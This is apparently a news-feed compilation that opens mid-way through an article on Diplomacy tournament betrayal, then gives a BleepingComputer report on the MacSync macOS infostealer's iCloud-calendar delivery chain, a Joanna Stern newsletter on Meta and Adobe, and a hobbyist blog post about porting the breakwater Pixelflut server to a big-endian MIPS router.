Brand likely saw it, too. He was too good a player to not see it. But at that point he had come too far. He couldn’t defend against it. He could only hope that Haver was as much a care bear as everybody said, and would keep his word that they’d go for the two-way.

But there was no denying it — Haver could solo this board on the next move.

He had never had a solo victory in a game before. He’d had opportunities, sure, but he turned them down in favor of keeping his word to his allies. I don’t want to hurt the other players just to get that win , he had always thought. Additionally, by always being a trustworthy ally who plays honorably, Haver had built up a reputation as someone who was good to work with in tournaments. “That’s why it was easy for people on my board to say, ‘He’s not going to stab his ally.’

“And that’s what allowed me to do it when I did.”

When the moves were read, Brand was crestfallen. Haver stabbed his partner and took enough supply centers from him and the other players to secure 18 units and the elusive solo victory. It was worth 270 points, enough to win him the tournament and the world championship.

“This is a guy I worked with for the entire game. The entire game. In most cases I would have stuck out with that. Because I legitimately felt bad about it then. And I feel bad about it now,” Haver said. “It’s going to bother me the entire drive home that I did him wrong.”

As Haver retired back to his dorm room for a couple of hours’ sleep before the next morning’s game, he ran into Brand in the hallway.

“If you want some revenge, I guess you can choke me now,” Haver joked. Brand was in no mood to kid. He wasn’t angry, just in a state of shock. Staring off into the distance, he mumbled, “I’m just trying to figure out what I could have done differently … ” He entered his dorm room and closed the door.

What likely rattled Brand wasn’t the complexity of his question, but the utter simplicity. What he should have done differently was to not trust Thomas Haver.

“T o me, Diplomacy isn’t a game of deception and manipulation,” Edi Birsan told me on the final morning of Dixiecon. “It’s a game about trust.”

Today Edi Birsan still plays Diplomacy, and had entered this event, though he wasn’t really playing to win. He had won enough trophies over his lifetime. Besides, he had recently been elected to the city council of Concord, California, where he lived, so he was putting his diplomatic skills to some real-world use now.

I had sought out Birsan after struggling to keep my emotions in check over the course of nonstop rapid-fire lying, arguing, and humiliation for the past 24 hours. I needed to know from the man who everyone from Thomas Haver to Chris Martin told me was the greatest Diplomacy player alive — was I not cut out for this game? Is the only way to be good at Diplomacy to be good at lying and manipulating others? Birsan didn’t think so.

“What I love about the game is that no one can really play the game ‘right,’” Birsan said. “Otherwise, after 50 years, that would have been discovered long ago and the hobby would have died of boredom.”

After all the anger, the manipulation, the frayed nerves, and the hurt feelings, I was left feeling something wholly unlike boredom, but something also unlike fun. My opponents were right: I was too trusting, too unwilling to lie, too willing to settle for draws. I was not thick-skinned. I was not an alpha nerd. But I comforted myself with the thought that even though I wasn ’t, neither were my pissed-off opponents. If they were, they’d have persuaded me to do what they wanted. My poor decisions were as much their fault as my own. This was the soft-bellied credo of a broken ego, but it was all I had left.

“There’s this stigma, if you will, attached to the game, that it’s about lying and betrayal,” Chris Martin said to me after Dixiecon. “When my son starts playing Diplomacy, and he will one day, what I want him to learn is the ability to present your argument to somebody, so that they see the merits of your case. The ability to take a setback, say, OK, that didn’t work out, but I’m gonna come back and I’ve got a new plan, we can still make this happen, still make this work together. And he will learn the opposite side to that moment of emotional betrayal, that when you look someone in the eye and you say you’re going to do something, then you do it, that is tremendously satisfying.”

One day I hope Chris Martin’s son and I can meet each other across the board, maybe at another World DipCon. When we do , I hope we can look each other in the eye, shake hands firmly, and keep our word to one another . We may not win the tournament, but we’ll know we aspired to play in a way that we can be proud of .

“Is there a ‘right way’ to live?” asked Birsan. “Not really. Diplomacy reflects life.”

Illustration by John Tomac.

MacSync malware uses public iCloud calendars to deliver new payloads

Bleeping Computer
www.bleepingcomputer.com
2026-09-24 16:53:35
A new variant of the MacSync malware targeting macOS systems now uses public iCloud calendar events to deliver new native payloads. [...]...
Original Article

MacSync malware uses public iCloud calendars to deliver new payloads

A new variant of the MacSync info-stealing malware targeting macOS systems now uses public iCloud calendar events to deliver fresh payloads.

MacSync is a Swift-based malware that emerged in April 2025 and has been observed recently being delivered in ClickFix campaigns disguised as Homebrew and macOS disk space analyzer tools.

Kaspersky researchers say that while earlier versions of the malware were derived from the AMOS stealer family, MacSync evolved and added new capabilities via modules.

Delivery chain

MacSync has been distributed to victims through social engineering, including ClickFix-style attacks, and through software presented as free, cracked, or as new applications.

The researchers note that the threat actor delivered the malware as a fake crypto wallet called Toria, which had a dedicated website and was promoted over social media platforms.

Kaspersky discovered the MacSync campaign that had two delivery methods. In the more complex one, a downloader fetches commands hidden in the description of a public iCloud calendar event, and then downloads the next-stage payload from iCloud.

The downloader feeds the retrieved calendar data to macOS's zsh shell. Most of the calendar text produces errors, but commands placed after the event’s DESCRIPTION: line run and fetch an archive with the malware components.

The archive contains an ‘APP’ bundle that acts as a dropper, leading to more stages that eventually retrieve the MacSync malware.

The latest MacSync infection chains
The latest MacSync infection chains
Source: Kaspersky

New backdoor module

The infostealer module remains largely unchanged, targeting browser history, cookies, and saved credentials, crypto wallet extension and app data, Telegram data, the Keychain file, system and device information, SSH, AWS, Kubernetes, Git, and shell configuration files.

Malware-generated password prompts
Malware-generated password prompts
Source: Kaspersky

The new module observed is an Objective-C backdoor that disguises itself as Finder, the default file manager on macOS. Its installer establishes persistence through a LaunchAgent, .zshrc modifications, and global Git hooks, while terminating macOS notification processes to prevent alerts from reaching the user.

The backdoor can perform the following actions on infected systems:

  • Run attacker-supplied AppleScript received from its command-and-control server.
  • Deploy a browser extension or replace an installed Ledger wallet app with versions supplied by the command-and-control (C2) server.
  • Collect additional system information and files, and upload them to the C2 server.
  • Check and establish persistence so it starts again after a reboot.

Kaspersky inferred the commands’ purposes from their names and status messages because it did not have the AppleScript code they would execute

The researchers also identified a “mystery” command, live_browser , which downloads and executes a component called sn_relay , whose purpose Kaspersky could not determine.

As MacSync continues to evolve and adopt more evasive and effective distribution chains, macOS users are advised to avoid executing commands they find online

It is also recommended to avoid downloading DMG files from suspicious sites and treat admin password prompts with caution.

article image

Build your security blueprint for AI-powered attacks

Join Mikko Hyppönen and security leaders from the NFL, CHANEL, and Atlassian for a two-hour digital summit on what AI-speed attacks change, what defenders should stop doing, and how to validate, decide, fix, and re-validate at machine speed.

Save your seat

Joanna Stern Interviews Mark Zuckerberg

Daring Fireball
thenewthings.com
2026-09-24 16:53:03
Great interview from Stern, as usual, seemingly conducted on the old set of Three’s Company. She opened by asking if AI is going to wipe out humanity, and I think Zuck whiffed by not simply laughing and saying no. She also directly asked his thoughts on people calling Meta Glasses “pervert glasses”....
Original Article

Hello! Yes, the newsletter is very late today, and you can blame Mark Zuckerberg. Just moments ago, the Meta CEO wrapped up his keynote at the company’s Connect conference and I posted my exclusive video interview with him.

I went to Menlo Park last week for an early look at Meta’s new products, including its audio-only Ray-Ban glasses, new VR glasses and more. And yes, we talked about whether AI is going to kill us all.

There are a LOT of questions to ask when Mark Zuckerberg unveils new products. How do the glasses work? What do you think people will use them for? What can the AI agent actually do? And, of course, just that real tiny one: Will AI kill us?

This evening, Meta unveiled new glasses and AI features at its annual Connect conference. But leading up to the event, last Friday, I sat down with Zuckerberg to talk about all of it .

There was no ignoring the bigger backdrop: the heated debate in Washington and across the tech industry over whether AI development is moving too fast and whether companies should slow down.

“I don’t think that we need some kind of industrywide coordination to not necessarily mess this up,” Zuckerberg told me. “I think that just each lab needs to take the time, and when it sees that there are issues, you just take the time that you need internally to basically make sure that you’re proceeding safely.”

Translation: Every AI company can police itself.

Beyond those more existential questions, Zuckerberg also walked me through Meta’s new products and laid out his vision for the future of computing. And it keeps getting wilder. He thinks that eventually most people will wear some version of smart glasses, with a personal AI agent right there alongside us—seeing what we see, hearing what we hear and whispering in our ears.

I spent a lot of the interview asking about trust because that vision requires giving Meta access to an extraordinary amount of our personal lives. What emerged was a picture of a company Zuckerberg is once again trying to reinvent—this time around AI, personal computing and a much more intimate relationship with its users.

You know what I’ve always thought PDFs needed? Podcasts.

OK, maybe not, but Adobe Acrobat now has some AI audio features that are actually useful. You can take a document—or even a collection of documents—and turn it into a personalized podcast or audio summary. So instead of sitting at your desk reading a 60-page report, you can listen to the important parts while walking the dog.

It’s part of a much bigger shift Adobe is making with Acrobat: turning it from the place where you open a PDF and hit Ctrl + F —hoping you remember the exact phrase you’re looking for—into an AI-powered workspace, where you can have a conversation with your documents and more easily show what you know.

There are a bunch of other new things, too. Acrobat can turn dense documents into visual reports with charts, key takeaways and summary slides. And a new Stylize feature can take a boring-looking PDF and apply a professionally designed template while keeping the document editable.

Fun fact: Agrippa was basically Augustus’s indispensable right-hand man—and the guy behind the original Pantheon. He also commanded the fleet that defeated Mark Antony and Cleopatra at the Battle of Actium in 31 BC.

This newsletter was written and curated by Joanna Stern and Adele Lowitz.

Running Pixelflut on a 2010 router

Lobsters
filmroellchen.eu
2026-09-24 16:36:27
Comments...
Original Article

Search results

.. / mipselflut

Published on:

Table of contents

I have been very involved in the Pixelflut space for a few years. At GPN24 , some beings, including myself, formed a “special interest group” for Pixelflut including a Codeberg org , a new website , and work began on an RFC. 1 And during that time, I also acquired a TP-Link Archer C7 (v2). A neat little all-in-one consumer router with WiFi, which notably is a well-supported OpenWRT platform. No wonder, the firmware update does basically no checks, so you can just drop OpenWRT into there and reboot right into Linux.

So one evening I had the idea of combining these two: how about running Pixelflut on the router? The router has no screen, so running Doom on it would be boring. (It would also possibly be pretty easy given that you could just compile one of the ultra-portable Linux Doom ports.) Instead, how about running something network-related instead, which is the router’s whole job. It would surely work very badly , given that it has a single-core 700MHz CPU and approximately 64MB RAM available for experiments 2 , but it could work! And I could stream the output back over the network to a display.

Figure 1:

slaps router this bad girl can fit so many pixels inside

The following post will be a chronically accurate retelling of my journey to get Pixelflut working on the Archer C7, all the steps I did wrong along the way and all the things I learned.


I reached for breakwater as my Pixelflut server for multiple reasons:

  • It’s written in Rust. Rust is pretty portable.
  • I am familiar with the code base and can modify it easily.
  • I am friends with the developer and can probably ask him questions, or even send him PRs :)
  • breakwater already has a “sink” plugin system that easily allows you to add other outputs.

Target Confusion

As far as I am concerned, OpenWRT is basically just Alpine, using the musl C library. So I cross-compiled breakwater for aarch64-unknown-linux-musl , simply 3 by specifying cargo build --target aarch64-unknown-linux-musl --release .

If you are not yet aware, that magic string is called a “target specifier”, or “target identifier”, or “target triple” because as you can clearly tell, there are four parts to it:

  • The CPU architecture. Here: Aarch64, aka. 64-bit ARM.
  • The vendor. Here: I don’t know who Linus Torvalds is.
  • The OS. Here: Linux.
  • The C library and its calling convention. Here: musl libc.

Target specifiers tell you what you are compiling code for (the target), which is particularly important when cross-compiling like here. To give you some examples, the three most common targets for desktops today are x86_64-pc-windows-msvc , aarch64-apple-darwin , and x86_64-unknown-linux-gnu . If you do Rust and Web in any combination you probably have heard of wasm32-unknown-unknown too. But maybe someday you really want to start Nintendo 3DS gamedev using Rust, and then you’ll have to reach for armv6k-nintendo-3ds . Or maybe you work in a dark place and need sparcv9-sun-solaris . In any case you need to identify the correct target to compile for.

Which is exactly what I didn’t do.

Because upon further research, it turns out that the processor in the Archer C7, the Qualcomm Atheros QCA9558 (aka. ath79 platform in OpenWRT), is not a 64-bit ARM core. It’s not a 32-bit ARM core. (It’s obviously not x86, I would have been even more surprised.)

It’s MIPS. 24Kc family MIPS core implementing MIPS32 Release 2 and MIPS16e. Both big-endian and little-endian, no hardware floating-point, 32 registers of RISC glory. A now-dead architecture that was used in venerable consoles like the PlayStation 1 and 2, and the Nintendo N64. And also tons of embedded systems from the 2000s all the way into the 2010s. Apparently the 24K was one of the most successful core families MIPS ever made. Rest in Peace, MIPS, 1984-2021. Its biggest achievement was probably not its architecturally visible branch delay slot, but its massive influence on SPARC, ARM, and most significantly, RISC-V.

At this point I was looking forward to this project even more. Not only do we have an obsolete architecture, but one I can probably even read, given that it shares so many instruction mnemonics and overall operational principles with RISC-V, an architecture I know back-to-front.

MIPS is far from obscure, so Rust compiler support is pretty good. So there are several targets to choose from. Which do I need?

root@Vodkafone:~# uname -a
Linux Vodkafone 6.12.87 #0 Wed May 13 22:42:09 2026 mips GNU/Linux

mips , that’s—not very helpful.

root@Vodkafone:~# file /bin/busybox
/bin/busybox: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, interpreter /lib/ld-musl-mips-sf.so.1, no section header

Thanks for looking up the OpenWRT docs for me.

It actually took me about two hours of trying different things to figure this out:

  • I tried compiling for mipsel-unknown-linux-musl , which required me to build a custom Rust compiler, which then required me to build the appropriate GCC compiler, which I didn’t manage to find a good source for 4 (the AUR failed me).
  • I tried the -gnu target for some reason but predictably got stuck when it actually wanted a glibc, and I couldn’t manage to compile one, not even with some further help from the AUR. (This has tons of dependencies like the target-specific Linux headers, which literally requires you to do a partial Linux kernel build.)
  • I actually figured out the correct target, but assumed my Rust compiler didn’t have it, so I spent another bunch of time compiling a custom rustc again, this time with the compiler trying to generate floating-point instructions for a processor without floating-point support:
Figure 2:

I don’t know which instruction ldc1 is, but f0 sure looks like a floating-point register, and $4 = x4 is the stack pointer. Finally a good use case for all that RISC-V knowledge!

  • I saw that I still needed a linker, and finally re-discovered musl-cross , so I quickly patched the AUR package for aarch64 musl cross to instead install the mips version.
  • breakwater-parser-c-bindings still acted up; you’ll see the --package breakwater option in the following.

To actually explain this fully, since it also wasn’t obvious to me for the first three hours of trying: MIPS is a large architecture family that also includes a 64-bit variant. This is obviously the 32-bit variant, but there are many different versions of 32-bit MIPS from 1984 until ~2010. Most importantly, all 32-bit MIPS processors support bi-endianness bisexual flag , meaning they can operate in either little-endian or big-endian mode depending on a variety of settings. On the QCA9558, only big-endian mode is supported; or at least Linux and OpenWRT only use that (I didn’t bother to check further). Either way, for some confusing reason, big-endian MIPS is called mips in the target identifier, while little-endian MIPS is called mipsel . I officially hereby name this project MIPSelflut , even if it won’t actually use MIPSel.

Breakwater Breaks

Anyways, after all of this tinkering and research, I finally realized that the correct target is built-in with the official rustup rustc, and you only need to build your own standard library. Since breakwater is already on nightly anyways, I didn’t even have to switch toolchains, I literally just had to:

$ cargo build -Zbuild-std	--config 'target.mips-unknown-linux-musl.linker="mips-linux-musl-gcc"' --target mips-unknown-linux-musl --release --no-default-features --package breakwater

-------- snip --------
error[E0432]: unresolved imports `std::sync::atomic::AtomicI64`, `std::sync::atomic::AtomicU64`
 --> /home/kleines/.cargo/registry/src/index.crates.io-1949cf8c6b5b557f/prometheus-0.13.4/src/atomic64.rs:7:25
  |
7 | use std::sync::atomic::{AtomicI64 as StdAtomicI64, AtomicU64 as StdAtomicU64, Ordering};
  |                         ^^^^^^^^^^^^^^^^^^^^^^^^^  ^^^^^^^^^^^^^^^^^^^^^^^^^ no `AtomicU64` in `sync::atomic`
  |                         |
  |                         no `AtomicI64` in `sync::atomic`
  |
  = help: consider importing this struct through its public re-export instead:
          crate::core::AtomicI64
  = help: consider importing this struct through its public re-export instead:
          crate::core::AtomicU64
help: a similar name exists in the module
  |
7 - use std::sync::atomic::{AtomicI64 as StdAtomicI64, AtomicU64 as StdAtomicU64, Ordering};
7 + use std::sync::at
-------- snip --------
error: could not compile `prometheus` (lib) due to 3 previous errors

Ah, well, that would have been too easy. Obviously, 32-bit MIPS won’t have 64-bit atomics (in fact, I am surprised it even has 32-bit atomics). But that was actually everything in terms of compiler errors: Once I removed the prometheus features by putting them behind a feature flag, it compiles.

Moving the binary to the router is actually its own challenge: the router has very limited flash, so I definitely don’t want to put the 3.5MB breakwater binary there. After some fiddling I got USB flash drives working, so I now have 64GB of scratch space. However, always plugging around USB drives is a bit annoying, and there is no SFTP (i.e. scp doesn’t work) so instead I came up with the following trick:

cat target/mips-unknown-linux-musl/release/breakwater | ssh root@vodkafone ash -c 'tee > /mnt/somedrive/breakwater'

This trick is pretty much canonical and widely known among sysadmins from what I can tell. If you want to make it more efficient for larger files, you can use a compression binary on both sides of the ssh pipe. sha256sum confirmed that this does not introduce any undesired newlines either.

Okay let’s go:

root@Vodkafone:/mnt/somedrive# chmod +x breakwater
root@Vodkafone:/mnt/somedrive# file ./breakwater
./breakwater: ELF 32-bit MSB pie executable, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, interpreter /lib/ld-musl-mips.so.1, not stripped
root@Vodkafone:/mnt/somedrive# ./breakwater
-ash: ./breakwater: not found

… excuse me? The binary is right there , you doofus?

I’m not sure why, but this triggered a vague memory of something, or maybe just my general Linux knowledge. If you have ever seen this kind of error on an executable file with the correct file type located in the correct directory, you might know what the issue is. I confirmed my suspicion very quickly:

root@Vodkafone:/mnt/somedrive# file /bin/busybox
/bin/busybox: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, interpreter /lib/ld-musl-mips-sf.so.1, no section header

Spoiler ahead if you want to figure out the issue yourself: The dynamic linker, aka. “interpreter”, is wrong. busybox correctly uses /lib/ld-musl-mips-sf.so.1 , while my freshly built breakwater uses /lib/ld-musl-mips.so.1 . The difference is the -sf in the middle there. As far as I can tell it stands for softfloat ; since this processor does not support floating-point, they are emulated in software. I looked through my compiler logs and it even warns about the fact that the target uses softfloat. There appears to be some confusion within the Rust build about whether to use softfloat or hardfloat; the Rust target documentation specifies that this should be a softfloat-by-default target. That makes a lot of sense considering most older MIPS processors (which are still supported by this target) don’t have floating-point support, just like the 24Kc.

Anyways, this is quickly fixed by overwriting the dynamic linker in RUSTFLAGS :

RUSTFLAGS='-Clink-arg=-Wl,--dynamic-linker=/lib/ld-musl-mips-sf.so.1' cargo build -Zbuild-std --config 'target.mips-unknown-linux-musl.linker="mips-linux-musl-gcc"' --target mips-unknown-linux-musl --release --no-default-features --package breakwater

Here we go:

root@Vodkafone:/mnt/somedrive# file ./breakwater
breakwater: ELF 32-bit MSB pie executable, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked, interpreter /lib/ld-musl-mips-sf.so.1, not stripped
root@Vodkafone:/mnt/somedrive# ./breakwater -f 10 --network-buffer-size 64000
2026-06-15T20:26:17.631397Z  INFO new{listen_addresses=[[::]:1234] network_buffer_size=64000 max_connections_per_ip=None}: breakwater::server: started Pixelflut server

That’s a working breakwater! On MIPS!

…which has no way of outputting the canvas besides PX get.

And which also doesn’t work, by the way. My Pixelflut client, hyperflut, said it couldn’t read back the canvas size. Manually trying nc and the server just doesn’t respond, even though the first round of testing shows me that the connection clearly works, so TCP itself between the machines is fine. breakwater listens to all public IPv6 addresses, the same as all other system services I can test (e.g. SSH). Nothing wrong there.

Then I started debugging the receive logic, to see what data is being received and what the parser says about that. And immediately, I have a revelation.

2026-06-15T20:51:17.212134Z DEBUG handle_connection{ip=2a04:6ec0:271:e850:f420:9a86:97fe:2fb7 network_buffer_size=64000}: breakwater::server: handling new connection
2026-06-15T20:51:19.255604Z DEBUG handle_connection{ip=2a04:6ec0:271:e850:f420:9a86:97fe:2fb7 network_buffer_size=64000}: breakwater::server: read data buffer=[72, 69, 76, 80, 10, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
2026-06-15T20:51:19.646435Z DEBUG handle_connection{ip=2a04:6ec0:271:e850:f420:9a86:97fe:2fb7 network_buffer_size=64000}: breakwater::server: read data buffer=[69, 76, 80, 10, 10, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
2026-06-15T20:51:19.925548Z DEBUG handle_connection{ip=2a04:6ec0:271:e850:f420:9a86:97fe:2fb7 network_buffer_size=64000}: breakwater::server: read data buffer=[76, 80, 10, 10, 10, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
2026-06-15T20:51:42.340922Z DEBUG handle_connection{ip=2a04:6ec0:271:e850:f420:9a86:97fe:2fb7 network_buffer_size=64000}: breakwater::server: read data buffer=[80, 10, 10, 10, 10, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
2026-06-15T20:51:43.443933Z DEBUG handle_connection{ip=2a04:6ec0:271:e850:f420:9a86:97fe:2fb7 network_buffer_size=64000}: breakwater::server: read data buffer=[10, 10, 10, 10, 10, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
2026-06-15T20:51:43.775232Z DEBUG handle_connection{ip=2a04:6ec0:271:e850:f420:9a86:97fe:2fb7 network_buffer_size=64000}: breakwater::server: read data buffer=[10, 10, 10, 10, 10, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
2026-06-15T20:51:58.556211Z DEBUG handle_connection{ip=2a04:6ec0:271:e850:f420:9a86:97fe:2fb7 network_buffer_size=64000}: breakwater::server: read data buffer=[10, 10, 10, 10, 72, 69, 76, 80, 10, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]

Since this probably doesn’t make any sense to you, I’ll try to explain: Initially, the buffer is correctly filled with a HELP\n command I sent via nc . The leftover zero bytes are expected, since the buffer needs some lookahead. At this point the parser should already detect the command, remove it from the buffer, and move on, which doesn’t happen. But then, when I send more newlines, the existing buffer data containing HELP is overwritten back-to-front, starting at the fourth byte , followed by a write of my next HELP input starting at the second group of four bytes .

Four bytes, 32 bits, back-to-front.

breakwater was not ready for Big Endian Architectures.

This is actually quite common in modern software engineering: When doing any kind of reinterpretation between bytes and e.g. 32-bit or 64-bit integers, people just forget that big endian exists and treat memory as unconditionally little-endian. Which obviously works fine on x86, it’s also not a problem on ARM, it’s not even a problem on every RISC-V implementation ever written. But it’s obviously a big problem on old (pre-PPC64LE) PowerPC, and it’s obviously a big problem on mips .

Return of the Big Endian

There were actually a few tricky endianness bugs in breakwater. I won’t bore you with the detailed debugging process or every detail, and you can read the code yourself if you care, but to summarize there were two groups of bugs:

  • In multiple places during the parsing, for performance reasons, breakwater uses unsafe code to read 32-bit and 64-bit chunks from a byte buffer. The result was unconditionally treated as little-endian, which is obviously wrong on big endian. By converting once during the loads, we can leave all of the rest of the code alone, since now the in-register order will be the same on all systems.
  • When reading back RGB(A) values for PX get (and others), to prepare the color data for string printing, breakwater used to_be() , which won’t swap the bytes on big endian. Again, since big-endian uses the same register order as little-endian, this swap always needs to happen.

The framebuffer order actually doesn’t matter, at least not for now—as long as bytes are always read and written as 32-bit units, the framebuffer internally uses the native byte order of the processor (ABGR on little-endian, RGBA on big-endian) and “converts” to the expected RGBA in-register order during loads and stores. This is good for performance, since we don’t have to do extra work on big-endian.

While fixing these bugs I also started running breakwater’s various tests just like the main binary. All of these bugs are actually caught by the tests, which is great!

And after all of that, we finally get some signs of life…

Figure 3:

Installing btop took a ton of flash space, I hope you’re happy for not having to stare at busybox top.

…in the form of maxed out CPU when I run hyperflut as gently as possible . hyperflut can only really run in super-aggressive mode. The effective network bandwidth is about 170Mbit/s, which sounds terrible given a 1Gbit/s link, but I’d consider that to be an absolute win. From experience, this should be about 17 megapixels per second, or just over 18 full frames of 720p (my current target resolution) per second. I limited the server to 10 frames per second, which is actually lower than that. We could look at it another way and say that the CPU can handle about 0.2 bit/Hz, which is not entirely terrible: a reasonable modern CPU with at least a dual-core processor at 2.5GHz gets this performance at 1Gbit/s of traffic. Sure, even my old 2014 Pixelflut server performs better (it does 10Gbit/s at <30% CPU, even though it is only about four times better than the hypothetical processor), but this is a 2004 32-bit MIPS!

What’s most impressive about this graph though is that memory usage is really really low, much lower than I expected. Sure, we’re not running any output backend, and we only have one client connected. And I started out with the minimum feasible network buffer size (64KB). But this means that memory should pretty much never be an issue.

These results were promising (I left it running for 48 minutes and it didn’t crash), but I still had the issue of not being able to see the canvas , the thing that Pixelflut is all about, if you remember.

Getting the canvas

I had several prefabricated options for a canvas output:

  • You can retrieve pixel data using PX get commands (we’ve talked about those previously). Building a client based on that is pretty trivial, and it requires no changes to the server, but performance absolutely sucks. I immediately ruled this out.
  • breakwater offers several backends, but none of them are viable:
    • libvnc sounds like a nightmare to make work on the limited MIPS system, both in terms of performance and disk space. Besides, I don’t want to compile it myself if it can be avoided.
    • The native display is obviously useless.
    • I recently added NDI support, but that is a proprietary library which only exists for AArch64 and x86_64 (and even needs SSE4.2 on there, so a significant amount of SIMD instructions).
    • RTMP streaming via FFmpeg sounds interesting, but again I don’t think encoding H.264 is in any way viable on that system. Also, where do I even put the FFmpeg binary, and where do I get it from?

So I had to do it myself, again. Since this is not supposed to be a high-performance installation (as discussed, 17Mpixel/s), we can probably get away with uncompressed video. Some quick math tells me that that would require almost 300Mbit/s if we use 32-bit color. This is wasteful in terms of bandwidth, but easy to do, since we can literally memcopy the framebuffer over the network, and receive it on the other end. Also, it will probably work with ffmpeg or gstreamer on the receiving end, since they’re supposed to be really good at sending and receiving raw video. So I won’t need to write special client software either. If the bandwidth turns out to be infeasible, only using 24-bit color cuts down to 220Mbit/s at a processing cost.

Actually though, ffmpeg…

The next day, ffmpeg sounded like a much better idea than the day before. ffmpeg supports raw video, and tons of stream formats. Also, I shouldn’t need to install ffmpeg in the router itself, throwing a bunch of binaries and libraries on my USB stick should be fine.

First challenge was getting a working ffmpeg. This took way more time than it should have, mainly because I don’t understand apk . I also made the router’s flash run out of space once, leading to a half-committed apk state in /lib which took a while to clean up. apk is not very robust under ENOSPC . In the end, the solution was apk fetch to quickly download all the binaries and libraries (you can skip the kernel stuff except alsa-lib , since we never try to talk to the kernel about its extended warranty A/V capabilities), then apk extract to dump them into the USB drive while treating it as a root directory. Some clever use of LD_LIBRARY_PATH later:

root@Vodkafone:/mnt/somedrive# LD_LIBRARY_PATH="$(pwd)/lib:$(pwd)/usr/lib" usr/bin/ffmpeg -version
ffmpeg version 6.1.4 Copyright (c) 2000-2025 the FFmpeg developers
built with gcc 14.3.0 (OpenWrt GCC 14.3.0 r32969-3f59bc0e14)
configuration: --enable-cross-compile --cross-prefix=mips-openwrt-linux-musl- --arch=mips --cpu=24kc --target-os=linux --prefix=/usr --pkg-config=pkg-config --enable-shared --enable-static --enable-pthreads --enable-zlib --disable-doc --disable-debug --disable-lzma --disable-vaapi --disable-vdpau --disable-outdevs --disable-altivec --disable-vsx --disable-power8 --disable-armv5te --disable-armv6 --disable-armv6t2 --disable-fast-unaligned --disable-runtime-cpudetect --disable-x86asm --enable-gnutls --disable-decoder=h264 --disable-decoder=hevc --disable-decoder=vc1 --disable-muxer=h264 --disable-muxer=hevc --disable-muxer=vc1 --disable-demuxer=h264 --disable-demuxer=hevc --disable-demuxer=vc1 --disable-parser=h264 --disable-parser=hevc --disable-parser=vc1 --enable-libopus --enable-libv4l2 --enable-small --enable-libshine --enable-libfdk-aac
libavutil      58. 29.100 / 58. 29.100
libavcodec     60. 31.102 / 60. 31.102
libavformat    60. 16.100 / 60. 16.100
libavdevice    60.  3.100 / 60.  3.100
libavfilter     9. 12.100 /  9. 12.100
libswscale      7.  5.100 /  7.  5.100
libswresample   4. 12.100 /  4. 12.100

Success.

root@Vodkafone:/mnt/somedrive# LD_LIBRARY_PATH="$(pwd)/lib:$(pwd)/usr/lib" usr/bin/ffmpeg -f lavfi -re -i 'testsrc=size=1280x720:rate=10' -c:v mpeg2video -f mpegts -omit_video_pes_length 0 'udp://[fd84:85b8::33]:48550'
-------- snip --------
Output #0, mpegts, to 'udp://[fd84:85b8::33]:48550':
  Stream #0:0: Video: mpeg2video, yuv420p(tv, progressive), 1280x720 [SAR 1:1 DAR 16:9], q=2-31, 200 kb/s, 10 fps, 90k tbn
-------- snip --------
frame=    9 fps=1.4 q=2.0 Lsize=      66kB time=00:00:00.70 bitrate= 777.8kbits/s speed=0.107x

1 fps. Failur.

I tried literally everything. Half of the streaming protocols didn’t want to work (RTMP, even with a half-assed nginx-rtmp setup, would not even work if I ran everything on my local machine), and the other half that did work (namely UDP and only UDP) were impossibly slow. I tried Motion JPEG, MPEG-2 (seen here), various transport streams including none, nothing went above 1fps. I think I did get MPEG-2 into a reasonable framerate with the test source once, but I can’t remember the ffmpeg command line (it was definitely -preset veryfast ). Either way, even when it was fast, it would consume 100% CPU, leaving no space for breakwater itself.

In the end I also tried rawvideo. The first big issue is that it’s seemingly impossible to extract the raw video stream out of MPEG-TS, since it’s included as a private data stream, at least not within one FFmpeg invocation. I eventually gave up trying to figure it out, I’m sure it’s possible by piping enough ffmpeg invocations into each other. What I tried instead was just dumping the raw video into UDP, which is surprisingly easy; pretty much the command line seen above, except with -f rawvideo and some extra options. Now, we got a reasonable… 40% CPU. Welp, I was still trying to actually receive video data, so after some more fiddling I managed to build this abomination:

$ nc -6ul 48551 | ffmpeg -fflags nobuffer -flags low_delay -probesize 32 -analyzeduration 1 -strict experimental -f rawvideo -video_size 1280x720 -pix_fmt rgb24 -r 10 -i - -c:v mjpeg -f avi pipe:1 | ffplay -framedrop -

I am confident this is the least amount of programs needed to receive un-containerized raw video over UDP: ffmpeg cannot take UDP as an input (as far as I can tell), and ffplay cannot specify all of these raw video options on the input. Since we need both, we need three programs; an extra netcat to receive the packets. FFmpeg is powerful, but its CLI is absolute dogshit.

Anyways, now I had a wayland window with the test source. Let’s attach breakwater! I quickly hacked some code into the existing FFmpeg sink to allow me to specify arbitrary output arguments. With target/debug/breakwater --override-streaming-parameters ' -c:v rawvideo -pix_fmt rgb24 -s 1280x720 -f rawvideo -omit_video_pes_length 0 -r 10 udp://[::1]:48551' in hand, I saw a black window once again, so it was time to start up hyperflut!

Figure 4:

No, that’s not hyperflut’s fault. Also, in reality, this glitches around a ton with different colors, but I’m not embedding a video just for that :)

Oh no. I understand now why people use proper video container formats. Because without containers, you don’t know where a frame starts and where it ends. And even under perfect conditions (i.e. localhost and identical stream specifications), it seems like there are some issues that mean that the client and server disagree on the format. I double-checked my format parameters a bunch of times, but this kind of issue can only happen with a byte-level misalignment, it seems. It worked beforehand, without breakwater in the loop, but now it’s broken :(

